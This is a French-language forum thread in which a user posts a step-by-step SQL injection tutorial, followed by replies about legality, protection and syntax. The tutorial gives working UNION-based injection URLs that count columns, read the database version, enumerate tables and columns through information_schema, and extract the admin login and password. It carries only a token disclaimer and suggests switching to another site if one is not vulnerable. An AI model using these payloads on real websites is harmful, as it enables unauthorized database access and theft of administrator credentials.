Kommunauty
Connexion
Inscription

[Tuto] injection sql


Patt Messages : 291

Salutation , comme je n'ai rien à faire voici un petit tuto pour faire une injection sql.

Avant de commencer je rappel que c'est illégal sauf si c'est juste pour faire des tests sur votre site web *blablabla* ni moi, ni kommunauty.fr, ni son hebergeur, si SiMax ne peuvent être tenus responsable de l'usage que vous faites de ce tuto.

Une injection sql c'est quoi ?

C'est une technique qui permet de récupérer des informations grâce à des commandes SQL.

C'est bon, let's go !

Nous avons ici dans l'exemple un site "???" qui correspond à www.???.com/commentaires/comm.php?id=45

Déjà rajoutez dans votre url un caractère spécial : www.???.com/commentaires/comm.php?id=45^

Vous avez donc un message d'erreur sur le site. Exemple : Unknown ligne 100 "order"

Si vous n'avez pas de message d'erreur, essayez un autre caractère spécial ou alors changez de site.

Maintenant nous allons essayer de trouver le nombre de "colonnes" :

Tapez : www.???.com/commentaires/comm.php?id=45+order+by+1-- (Vous n'avez normalement pas d'erreur)

www.???.com/commentaires/comm.php?id=45+order+by+100-- (Vous avez normalement une erreur)

Maintenant il faut trouver le bon nombre :

essayez : www.???.com/commentaires/comm.php?id=45+order+by+90--

www.???.com/commentaires/comm.php?id=45+order+by+80--

www.???.com/commentaires/comm.php?id=45+order+by+70--

Jusqu'à trouver le bon.

Dans notre exemple, nous allons dire que l'erreur est à partir de 12.

Donc le bon nombre est 11.

Donc, maintenant que nous avons le nombre de colonnes tapez :

www.???.com/commentaires/comm.php?id=45+union+select+1,2,3,4,5,6,7,8,9,10,11--

Si vous trouvez 5, allez jusque 5, idem pour 15 ou plus.

Vous avez normalement un chiffre qui apparait là où était l'erreur sql.

Ici, disons que le chiffre est 9.

Maintenant il faut trouver la version sql qu'utilise le site :

www.???.com/commentaires/comm.php?id=45+union+select+1,2,3,4,5,6,7,8,@@version,10,11--

Remplacez donc 9 par @@version.

Maintenant à la place du chiffre 9 vous avez quelque chose dans le genre : 5.0.58-LOG

Nous savons désormais que la version de sql est 5.x, donc sa va on peut continuer.

Tapez :

www.???.com/commentaires/comm.php?id=45+UNION+SELECT+1,2,3,4,5,6,7,8,%20group_concat(table_name),10,11+from+information_schema.tables--

Remplacez donc le chiffre 9 par %20group_concat(table_name).

Plusieurs mots sont maintenant visibles. Cherchez en un d'interessant, donc l'exemple : ADMIN.

Tapez donc :

www.???.com/commentaires/comm.php?id=45+UNION+SELECT+1,2,

3,4,5,6,7,8,group_concat(column_name),10,11+from+information_schema.columns+where+table_name='ADMIN'--

Remplacez donc le chiffre 9 par group_concat(column_name).

A ce stade il y a 2 possibilités : Soit le serveur accepte et donc pas de soucis passez l'étape écrite en verte ci-dessous.

Soit le serveur n'accepte pas alors vous devez transformer ADMIN en en Hexadécimal.

Pour convertir le mot en Hexadécimal rendez vous sur : <a class="postlink" href="http://www.asciitable.com/" target="_blank">http://www.asciitable.com/</a>

ADMIN est donc égal à 0x41444D494E.

Donc tapez : www.???.com/commentaires/comm.php?id=45+UNION+SELECT+1,2,

3,4,5,6,7,8,group_concat(column_name),10,11+from+information_schema.columns+where+table_name='0x41444D494E'--

(Nous avons remplacer ADMIN par 0x41444D494E)

Dans l'exemple nous avons besoin d'identifiants.

www.???.com/commentaires/comm.php?id=45+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,LOGIN,PASS),10,11+from+admin--

Remplacez donc le chiffre 9 par concat_ws(0x3a,LOGIN,PASS).

Voilà ! Vous avez le login/mdp admin !

Merci d'avoir suivit le tuto.

mercredi 27 mai 2009 (Dernière édition samedi 22 octobre 2011)

SiMax Messages : 7572

Merci pour le tutoriel ! Pratique pour savoir comment mieux protéger un site maintenant qu'on sait ça ! C'est facile à protéger mais la plupart des personnes ne prennent pas la peine de le faire...

mercredi 27 mai 2009

Alexou Messages : 2506

Tu as pas un site pour tester?  :kiss:

Mais je vois pas, où on apprend à protéger son site, si on se hack soi même, on se protège pas.

Et pourquoi, tu met ADMIN en hexa?

Et d'où tu peux savoir ce qu'il faut taper dans l'adresse, pour obtenir tout ça (hormis le fais que tu était hacker )

mercredi 27 mai 2009

Ancienasgard Messages : 333

Si tu teste sur un site qui ne t appartiens pas ou que le propriétaire ne t'a aps donné son autorisation c est ilégal et donc passible de sanction. Testes sur ton site si tu arrive a tout trouvé securise mieu ton site

mercredi 27 mai 2009

Alexou Messages : 2506

Je vais essayer sur Kommunauty

Non, jdecc, j'ai tester sur: <a class="postlink" href="http://warspaces.redby.fr/" target="_blank">http://warspaces.redby.fr/</a>

Mais ça marche pas, quelqu'un peux m'aider?

C'est mon site, donc vous pouvez y allez

mercredi 27 mai 2009

Alexou Messages : 2506

J'ai l'impression que toutes mes questions sont à l'abandon

dimanche 31 mai 2009

Anonyme Messages : 0

T'es pas obligé de mettre des '+' pour remplacer les espaces. Exemple: order by1-- a le même effet que order+by+1--

Sinon, merci

a+

dimanche 16 octobre 2011

Répondre Pour répondre, tu dois d'abord t'inscrire rapidement sur Kommunauty. Rejoins-nous vite !